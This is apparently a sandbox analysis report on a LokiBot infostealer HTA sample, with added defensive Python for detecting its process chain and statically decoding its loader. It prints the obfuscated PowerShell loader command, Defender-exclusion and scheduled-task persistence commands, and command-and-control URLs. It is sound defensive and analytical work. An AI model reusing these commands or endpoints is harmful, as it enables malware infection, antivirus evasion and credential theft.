Analysis
max time kernel: 138s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-11-2024 02:13
Static task: static1
Behavioral task: behavioral1
  Sample: 11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182.hta
  Resource: win7-20240708-en
Behavioral task: behavioral2
  Sample: 11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182.hta
  Resource: win10v2004-20241007-en
General
Target: 11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182.hta
Size: 178KB
MD5: e80a6dc30c45134e8c433ef07277022f
SHA1: 9041ab7b0cf03e4c18f86ff32eac95c3ad06f462
SHA256: 11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182
SHA512: 6156f6fcb24fedaabb7d1d62a0ff71e7bd8c6ab194c1a5c1b7ccc25644ba36dd62a79a8989dba98015044502a64db5c32187b802cc42dc964f25323c352519d8
SSDEEP: 96:4vCl17nlkfktbLVe4I9qWs5cew1WyNk6O5Q:4vCldn+s9he4CqWj26O5Q
Malware Config
Extracted family: lokibot
URLs:
  http://94.156.177.95/simple/five/fre.php
  http://kbfvzoboss.bid/alien/fre.php
  http://alphastand.trade/alien/fre.php
  http://alphastand.win/alien/fre.php
  http://alphastand.top/alien/fre.php
Signatures

Lokibot family

Blocklisted process makes network request (1 IoC)
  flow 14, pid 4464, pOwersheLl.eXe

Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  pid 4240 powershell.exe
  pid 1376 powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment (2 IoCs)
  pid 4464 pOwersheLl.eXe
  pid 4980 powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up the country code configured in the registry, likely a geofence check.
  Key value queried: \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation (caspol.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation (mshta.exe)

Executes dropped EXE (3 IoCs)
  pid 3392 caspol.exe
  pid 2008 caspol.exe
  pid 4028 caspol.exe

Reads user/profile data of web browsers (3 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.

Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  Key opened: \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (caspol.exe)
  Key opened: \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook (caspol.exe)
  Key opened: \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (caspol.exe)

Suspicious use of SetThreadContext (1 IoC)
  PID 3392 set thread context of 2008; pid 3392 caspol.exe; procid_target 112

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 9 IoCs)
  Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by each of: mshta.exe, pOwersheLl.eXe, cvtres.exe, powershell.exe, powershell.exe, schtasks.exe, powershell.exe, csc.exe, caspol.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 4648 schtasks.exe

Suspicious behavior: EnumeratesProcesses (10 IoCs)
  pid 4464 pOwersheLl.eXe (2 events)
  pid 4980 powershell.exe (2 events)
  pid 4240 powershell.exe (2 events)
  pid 1376 powershell.exe (2 events)
  pid 3392 caspol.exe (2 events)

Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Token: SeDebugPrivilege, pid 4464 pOwersheLl.eXe
  Token: SeDebugPrivilege, pid 4980 powershell.exe
  Token: SeDebugPrivilege, pid 4240 powershell.exe
  Token: SeDebugPrivilege, pid 1376 powershell.exe
  Token: SeDebugPrivilege, pid 3392 caspol.exe
  Token: SeDebugPrivilege, pid 2008 caspol.exe

Suspicious use of WriteProcessMemory (36 IoCs)
  source pid / process   ->  target pid   procid_target   calls
  1940 mshta.exe         ->  4464         85              3
  4464 pOwersheLl.eXe    ->  4980         88              3
  4464 pOwersheLl.eXe    ->  624          93              3
  624  csc.exe           ->  752          94              3
  4464 pOwersheLl.eXe    ->  3392         100             3
  3392 caspol.exe        ->  4240         105             3
  3392 caspol.exe        ->  1376         107             3
  3392 caspol.exe        ->  4648         109             3
  3392 caspol.exe        ->  4028         111             3
  3392 caspol.exe        ->  2008         112             9

outlook_office_path (1 IoC)
  Key opened: \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (caspol.exe)

outlook_win_path (1 IoC)
  Key opened: \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (caspol.exe)
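The signatures above describe a chain that can be detected from process-creation and cross-process API telemetry alone: mshta.exe launching an obfuscated PowerShell loader, PowerShell compiling C# on the fly through csc.exe, a dropped executable running from AppData\Roaming, Add-MpPreference exclusions for user-writable paths, a scheduled task created from an XML file in Temp, and a parent calling SetThreadContext on a child that runs the same image. The report's own numbers give the tell for the last one: every ordinary child received exactly 3 WriteProcessMemory calls from its parent, while the 3392 -> 2008 caspol.exe pair received 9. The Python below is an added example written for this page, not tooling from the sandbox vendor or code from the sample. Its event records are constructed from the report's process tree and API tables with shortened command lines, the rule names are this example's own, and the baseline of three start-up writes per child is an assumption taken from this report's data rather than a general constant.

```python
"""Rule-based detection over process-creation and cross-process API events (added example, not sandbox code)."""
import re
from collections import Counter

# Constructed process-creation events (pid, ppid, image path, command line) modeled on the report's
# process tree; command lines are shortened to what the rules inspect.
PROCS = [
    (1940, 900, r"C:\Windows\SysWOW64\mshta.exe",
     r'C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sample.hta"'),
    (4464, 1940, r"C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe",
     "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn('FROmbASE64STRinG(')"),
    (4980, 4464, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT"),
    (624, 4464, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     r'csc.exe /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3r12k2sf\3r12k2sf.cmdline"'),
    (752, 624, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
    (3392, 4464, r"C:\Users\Admin\AppData\Roaming\caspol.exe", r'"C:\Users\Admin\AppData\Roaming\caspol.exe"'),
    (4240, 3392, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell.exe Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"'),
    (1376, 3392, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell.exe Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"'),
    (4648, 3392, r"C:\Windows\SysWOW64\schtasks.exe",
     r'schtasks.exe /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp775E.tmp"'),
    (4028, 3392, r"C:\Users\Admin\AppData\Roaming\caspol.exe", r'"C:\Users\Admin\AppData\Roaming\caspol.exe"'),
    (2008, 3392, r"C:\Users\Admin\AppData\Roaming\caspol.exe", r'"C:\Users\Admin\AppData\Roaming\caspol.exe"'),
]

# Constructed cross-process API events (api, source pid, target pid) with the call counts
# from the report's WriteProcessMemory and SetThreadContext tables.
API = (
    [("WriteProcessMemory", 1940, 4464)] * 3
    + [("WriteProcessMemory", 4464, 4980)] * 3
    + [("WriteProcessMemory", 4464, 624)] * 3
    + [("WriteProcessMemory", 624, 752)] * 3
    + [("WriteProcessMemory", 4464, 3392)] * 3
    + [("WriteProcessMemory", 3392, 4240)] * 3
    + [("WriteProcessMemory", 3392, 1376)] * 3
    + [("WriteProcessMemory", 3392, 4648)] * 3
    + [("WriteProcessMemory", 3392, 4028)] * 3
    + [("WriteProcessMemory", 3392, 2008)] * 9
    + [("SetThreadContext", 3392, 2008)]
)

# Assumption taken from this report's data: every ordinary child got exactly 3 parent writes during
# start-up; a hollowed child receives the replacement image on top of that. Measure this in your own telemetry.
STARTUP_WRITES = 3
INTERPRETERS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.IGNORECASE)
EP_BYPASS = re.compile(r"-ex\w*\s+bypass", re.IGNORECASE)  # -ex / -ep / -executionpolicy bypass


def basename(path: str) -> str:
    """Case-folded file name, so pOwersheLl.eXe and powershell.exe compare equal."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(procs, api):
    """Return (rule, pid) findings; pid is the process the rule fires on (the injected child for hollowing)."""
    by_pid = {p[0]: p for p in procs}
    findings = []
    for pid, ppid, image, cmd in procs:
        name, low = basename(image), cmd.lower()
        parent_name = basename(by_pid[ppid][2]) if ppid in by_pid else ""
        if name == "powershell.exe" and parent_name == "mshta.exe":
            findings.append(("mshta_spawns_powershell", pid))
        if name == "powershell.exe" and "frombase64string" in low and EP_BYPASS.search(cmd) and "-nop" in low:
            findings.append(("obfuscated_powershell_loader", pid))
        if "add-mppreference" in low and "-exclusionpath" in low and USER_WRITABLE.search(cmd):
            findings.append(("defender_exclusion_user_path", pid))
        if name == "schtasks.exe" and "/create" in low and "/xml" in low and "\\temp\\" in low:
            findings.append(("schtasks_from_temp_xml", pid))
        if name == "csc.exe" and parent_name == "powershell.exe":
            findings.append(("powershell_runtime_compile", pid))
        if USER_WRITABLE.search(image) and parent_name in INTERPRETERS:
            findings.append(("dropped_exe_from_appdata", pid))
    # Hollowing: the parent sets the thread context of a same-image child after writing more than the start-up baseline.
    writes = Counter((src, dst) for api_name, src, dst in api if api_name == "WriteProcessMemory")
    for api_name, src, dst in api:
        if api_name != "SetThreadContext" or src not in by_pid or dst not in by_pid:
            continue
        same_image = basename(by_pid[src][2]) == basename(by_pid[dst][2])
        if same_image and writes[(src, dst)] > STARTUP_WRITES:
            findings.append(("process_hollowing_self_injection", dst))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(PROCS, API):
        print(f"{rule:36} pid {pid}")
```

The second PowerShell instance (4980) carries the same `-EX bYPaSS -nOp -w 1` flags but no base64 stage, so it is deliberately not flagged as the loader; its parent relationship and the Device Credential Deployment signature are what make it interesting, and a rule keyed on flags alone would also fire on plenty of administrative scripts.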
Processes

C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  PID: 1940
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe
    Command line: "C:\Windows\sYStem32\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe" "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'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'+[CHAr]0x22+'))')))"
    PID: 4464
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT
      PID: 4980
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3r12k2sf\3r12k2sf.cmdline"
      PID: 624
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC719.tmp" "c:\Users\Admin\AppData\Local\Temp\3r12k2sf\CSCEF7EBA91F50543469AF076C0231EAEEA.TMP"
        PID: 752
        - System Location Discovery: System Language Discovery

    C:\Users\Admin\AppData\Roaming\caspol.exe
      Command line: "C:\Users\Admin\AppData\Roaming\caspol.exe"
      PID: 3392
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
        PID: 4240
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"
        PID: 1376
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\schtasks.exe
        Command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp775E.tmp"
        PID: 4648
        - System Location Discovery: System Language Discovery
        - Scheduled Task/Job: Scheduled Task

      C:\Users\Admin\AppData\Roaming\caspol.exe
        Command line: "C:\Users\Admin\AppData\Roaming\caspol.exe"
        PID: 4028
        - Executes dropped EXE

      C:\Users\Admin\AppData\Roaming\caspol.exe
        Command line: "C:\Users\Admin\AppData\Roaming\caspol.exe"
        PID: 2008
        - Executes dropped EXE
        - Accesses Microsoft Outlook profiles
        - Suspicious use of AdjustPrivilegeToken
        - outlook_office_path
        - outlook_win_path
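The PowerShell command line that mshta.exe launches (PID 4464) never contains its real payload as readable text. It builds it by concatenation: the `::` operator is assembled from `[ChaR]0x3A` and `[cHAr]58`, the double quotes from `[ChAR]34` and `[CHAr]0x22`, and the assembled string, `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))`, goes to an inner Invoke-Expression whose result (the decoded next stage) the outer Invoke-Expression runs. The base64 argument is elided in this page's rendering. The Python below is an added example for this page, not code from the report or from the sample: it reconstructs the concatenated string statically, without running PowerShell, extracts the base64 argument and decodes the stage. The command line it processes is a constructed one of the same shape with a harmless placeholder as stage 2, and it also accepts the Unicode (UTF-16LE) and ASCII variants of the same GetString/FromBase64String pattern, which this sample does not use.

```python
"""Static reconstruction of a [char]-concatenated PowerShell loader (added example, not from the report)."""
import base64
import re

# Tokens of the concatenation expression: 'literal' ('' escapes a quote), [char]N or [char]0xN, '+', whitespace.
TOKEN_RE = re.compile(
    r"'((?:[^']|'')*)'"
    r"|\[char\]\s*(0x[0-9a-f]+|\d+)"
    r"|(\+)"
    r"|(\s+)",
    re.IGNORECASE,
)
IEX_RE = re.compile(r"invoke-expression\s*\(", re.IGNORECASE)
# The string this loader shape produces: [Encoding]::X.GetString([Convert]::FromBase64String("..."))
B64_RE = re.compile(
    r"\[system\.text\.encoding\]::(utf8|unicode|ascii)\.getstring\(\s*"
    r"\[system\.convert\]::frombase64string\(\"([A-Za-z0-9+/=]+)\"\)\s*\)",
    re.IGNORECASE,
)
ENCODINGS = {"utf8": "utf-8", "unicode": "utf-16-le", "ascii": "ascii"}


def resolve_concat(expr: str) -> str:
    """Fold 'a'+[char]0x3A+'b' into 'a:b' without evaluating anything."""
    out, pos = [], 0
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            raise ValueError(f"unsupported token at offset {pos}: {expr[pos:pos + 16]!r}")
        literal, code, _plus, _ws = m.groups()
        if literal is not None:
            out.append(literal.replace("''", "'"))
        elif code is not None:
            out.append(chr(int(code, 16) if code.lower().startswith("0x") else int(code)))
        pos = m.end()
    return "".join(out)


def innermost_iex_argument(cmdline: str) -> str:
    """Return the argument text of the innermost Invoke-Expression( ... ) call.
    Parentheses inside single-quoted literals are ignored, so a literal such as '))' cannot close the call early."""
    starts = [m.end() for m in IEX_RE.finditer(cmdline)]
    if not starts:
        raise ValueError("no Invoke-Expression( call found")
    start = i = starts[-1]
    depth, in_str = 1, False
    while i < len(cmdline):
        c = cmdline[i]
        if in_str:
            if c == "'":
                if cmdline[i + 1:i + 2] == "'":
                    i += 1  # doubled quote is an escaped quote inside the literal
                else:
                    in_str = False
        elif c == "'":
            in_str = True
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return cmdline[start:i]
        i += 1
    raise ValueError("unbalanced parentheses in Invoke-Expression argument")


def decode_stage(cmdline: str) -> tuple:
    """Return (reconstructed inner expression, decoded next-stage script)."""
    reconstructed = resolve_concat(innermost_iex_argument(cmdline))
    m = B64_RE.search(reconstructed)
    if not m:
        raise ValueError("reconstructed expression is not the expected GetString(FromBase64String()) shape")
    encoding, blob = m.group(1).lower(), m.group(2)
    return reconstructed, base64.b64decode(blob).decode(ENCODINGS[encoding])


# Constructed command line with the same shape as the report's mshta -> PowerShell loader;
# the stage-2 script is a harmless placeholder, not the sample's real payload.
STAGE2 = "Write-Output 'constructed stage-2 placeholder'"
STAGE2_B64 = base64.b64encode(STAGE2.encode()).decode()
SAMPLE_CMDLINE = (
    "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; "
    "INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58"
    "+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'"
    + STAGE2_B64 + "'+[CHAr]0x22+'))')))"
)

# Second constructed variant: same pattern, UTF-16LE ("Unicode") payload, no [char] tricks.
UNICODE_STAGE = "Write-Output 'unicode variant'"
SAMPLE_UNICODE_CMDLINE = (
    "powershell -nop -c Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]::Unicode.GetString("
    "[System.Convert]::FromBase64String(\""
    + base64.b64encode(UNICODE_STAGE.encode("utf-16-le")).decode() + "\"))')))"
)

if __name__ == "__main__":
    inner, stage2 = decode_stage(SAMPLE_CMDLINE)
    print("reconstructed:", inner)
    print("stage 2:", stage2)
```

Against the real command line the decoded stage is whatever the elided base64 blob holds; the point of doing this statically is that the loader's inner Invoke-Expression is only a string builder, so nothing in it needs to execute to recover the next stage, and the same tokenizer resolves any `[char]` / single-quote concatenation regardless of the casing the sample uses.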
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)
Downloads

1.
  Filesize: 2KB
  MD5: 968cb9309758126772781b83adb8a28f
  SHA1: 8da30e71accf186b2ba11da1797cf67f8f78b47c
  SHA256: 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
  SHA512: 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

2.
  Filesize: 18KB
  MD5: 77a19fae546cc5a8215da61b018fe201
  SHA1: 9148bcb04b8fead75f4f262bf6e3efaca6f074ff
  SHA256: a52359a84d379ef92c36a3c455d570aaff606c10f24aa89db3768a834a4cac21
  SHA512: 3e911067cef28c64113adde76f6cddf33e5526a12ab788464894f62c71f491fc0e7c5cd2a8eb197629c5fee81991d282e7aace6a47ce8a48e07604e966a5a0db

3.
  Filesize: 17KB
  MD5: c8c4710426720a42c39c741c417f0ff0
  SHA1: e2aa3d9e64ea214e7c173c2b5def63566d0fb791
  SHA256: 00f25b082ac90a05ee3b278fabf68c85c5b70d83dc9b6f7aa7e6d033f289243c
  SHA512: e1f4af8b832544aee75ea224fbcbe18f1cefae78be26fc46dee505846d6c852d3e014ab32888da5d21fe61ac2972b606d8b8e71390741c670dd5b09e631109e2

4.
  Filesize: 3KB
  MD5: 047db5d2abb24113a51e996fd6787210
  SHA1: 4972acf6e257c3247dd1ff92ff62006a8066a044
  SHA256: 9481b624c8327e4d3b4c5248cd3c13179765c7f48fd4d8c0e500f92b7730412e
  SHA512: ecb3c52d241ff60adbaa6eddb071a252a154aae6d7c674f967f264985c3345121251d2ac3c334420b4cf8ccc36aa587b724448da7d1c078b2881b973a7a879d6

5.
  Filesize: 1KB
  MD5: 79ba557091a03b3908b700f966ed045e
  SHA1: 13e974cfb985dfc77f84e5d0ecb1a991de64d0c5
  SHA256: 481e0cda505d1bb8329a9dbed9ff2b7c5c2c217604aed8c78b3793e103c45328
  SHA512: 1ed2edff2072b4ce646cf70ad0c7671f6c47f5a26bc38e790f2a7ae3ed159865ad0c524f3bac6e988397fc2b7188ab62e455b03af4a4655944e10a934552408e

6.
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

7.
  Filesize: 1KB
  MD5: 366c1d61f126fa1ee5fd11e6ee6db782
  SHA1: 54424fed9bb9412f3688f80950e442c75eb707fd
  SHA256: 98cd5d7ff45e1df10d5d44c41cb4a30f2275e61b7f1a95c52236f4bf1d3c65a0
  SHA512: e0aeb73077ca58fcac23b0cd07d964c34b61fc91465322f76d8df30288ee7fb47ad107c392d86aae5ec53464449a29b678ba8d47cd0aede77f4e6fd62de042f3

8. C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\0f5007522459c86e95ffcc62f32308f1_755b0f1a-bb38-4bb2-bc7e-240c892146ee
  Filesize: 46B
  MD5: d898504a722bff1524134c6ab6a5eaa5
  SHA1: e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
  SHA256: 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
  SHA512: 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

9. C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\0f5007522459c86e95ffcc62f32308f1_755b0f1a-bb38-4bb2-bc7e-240c892146ee
  Filesize: 46B
  MD5: c07225d4e7d01d31042965f048728a0a
  SHA1: 69d70b340fd9f44c89adb9a2278df84faa9906b7
  SHA256: 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
  SHA512: 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

10.
  Filesize: 568KB
  MD5: 318ff90d7a2797a041b836f7f8900f62
  SHA1: fdda6afed7a1643ae353e7a635e6744c2b0a07d5
  SHA256: 241d0df35796a2c2ae0ae4af70ef9e6571c23536fef35c1c0c172d703203a430
  SHA512: 808942ba5db2e4d3d1d29a52c065acad4fcaae328dc43a3b977234f1b58d2838abf73d03b0992cd0f5ac4939e29f354c6c2ea25a4822a461b8ef74cec0eb3aac

11.
  Filesize: 464B
  MD5: f8419bbc398e1a2b134eec88b333f8f6
  SHA1: 57ebba4cad00272da80b919df0908ec40f9be48a
  SHA256: 25fccfa20b9b6d921f804167f1637df00cdd3203af9c0313f99de7c6e9989db3
  SHA512: b1f4044b7a62e1de69d8e4a8ebf4db6bb24fd40d486ec5e44bd3e6b835e62ef5078c79236ded9c21ce1b0acd3575acaf1908f4fcc6ee12f1fd5f7455c4b14674

12.
  Filesize: 369B
  MD5: 529bf2897ad4741cd16f28e263479182
  SHA1: 87e145a6cb38b99b422144f4714f68d4171be67d
  SHA256: 30fa4fae0e4b8df16ff2b37a101f64af84b753964fedb64c7ba8526236f23822
  SHA512: 87e811423e835ec369ed00503a18c9225d9db9aad75c0cac710c2816c8be2cd14db5ec3d5930c81ed52b260d3f20387ffbdd540264ad4498cb209c9da9b5429b

13.
  Filesize: 652B
  MD5: 7e4c1d97410eda85b59db63274d607c2
  SHA1: 85434df29baf1e1b6df92e1324a84184d4d3483b
  SHA256: 8e0be0f884ce86c6acd923a9d3df8640c96ac21997bfc9a9f123fc35c8811d97
  SHA512: 95fd7ec35fc3b5c85b33be16df4091db61e7be7a92452b5870a9e89d509f95c3f33cb28d5e43654237f32af9869570a62123263234b116249f75e74f6b11e78a